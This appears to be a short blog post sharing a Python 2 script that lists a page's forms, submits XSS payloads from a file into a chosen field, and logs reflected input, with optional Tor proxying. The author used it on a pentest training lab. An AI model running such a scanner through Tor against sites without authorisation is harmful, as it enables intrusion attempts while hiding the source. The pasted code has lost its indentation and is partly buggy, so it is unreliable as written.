Automated XSS

I created this tool for locating XSS vulnerabilities in specific fields on a webpage. It uses the python module "mechanize". What this module does is allow you browse webpages programmatically. This comes in useful for creating web spiders, brute force tools, spam-bots or anything requiring repetitive browser use. In this case I have created a tool to strip out any web forms on a specified page and automate an XSS attack on a chosen field. It works by imputing a string in an external file to a specified field. It then reads the response and checks the code for that string. This enables us to see if the input is being sanitized or filtered. If it find unsanitized input it outputs the string and the tested field to a file. This tool is buggy as it does not implement very good error handling but it helped me find XSS vulns on the securitytube.net challenges pages.

http://pentesteracademylab.appspot.com//lab/webapp/htmli/1

I have also added tor support to learn how to implement proxy support in future tools. If no tor proxy is defined when run it will not use tor. 

#!/usr/bin/python

import sys

import mechanize

import socks

import socket

import urllib

import re

def torProxy(torIP):

tor = torIP.split(":")

socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, tor[0], int(tor[1]))

socket.socket = socks.socksocket

print "\nConnecting to TOR proxy: " + torIP

print "Using TOR address: " + get_external_ip()

def get_external_ip():

    site = urllib.urlopen("http://checkip.dyndns.org/").read()

    grab = re.findall('\d{2,3}.\d{2,3}.\d{2,3}.\d{2,3}', site)

    address = grab[0]

    return address

def printforms():

print"""

###################################################

###################################################

Available Forms

###################################################

###################################################

"""

for form in br.forms():

print form

def beginAttack(form_no, form_field):

file = open("XSS_RESULTS", "a")

file.write("\n*************************************\n" + sys.argv[2] + "\n*************************************\n")

for line in attacks:

try:

print "Trying :" + line

br.select_form(nr=form_no)

br.form[form_field] = line

br.submit()

if not line in br.response().read():

continue

else:

xssFound(line, file, form_no)

except:

print"XXXXXXXXX Some kind of crash! XXXXXXXXXXXXX"

xssFound(line, file, form_no)

return

file.close()

def xssFound(line, file, form_no):

file.write("Form no: " + str(form_no) + "\n")

file.write("Form field: " + form_field + "\n")

file.write("XSS: " + line + "\n")

return

global attacks 

attacks = [] #List to hold imported attacks

try:  

torIP = sys.argv[3]

torProxy(torIP)

except:

print "Unable to connect to TOR"

pass

try:

print "\nImporting attacks from : " + sys.argv[1]

for line in open(sys.argv[1], "r").readlines():

attacks.append(line.strip())

print "Import Successfull"

except:

print "\nUsage: XSS <file> <url> <127.0.0.1:9150>(optional)\n"

sys.exit()

#Initialize the Browser object and open the url

try:

br = mechanize.Browser()

br.open(sys.argv[2])

except:

print "Usage: XSS <importFile> <url>"

sys.exit()

printforms()

print "\nSelect the form number (starting from 0) and the field in brackets without the equals sign."

form_no = int(raw_input("Form number: "))

form_field = raw_input("Form field: ")

beginAttack(form_no, form_field)

print "Attack Complete"

Output: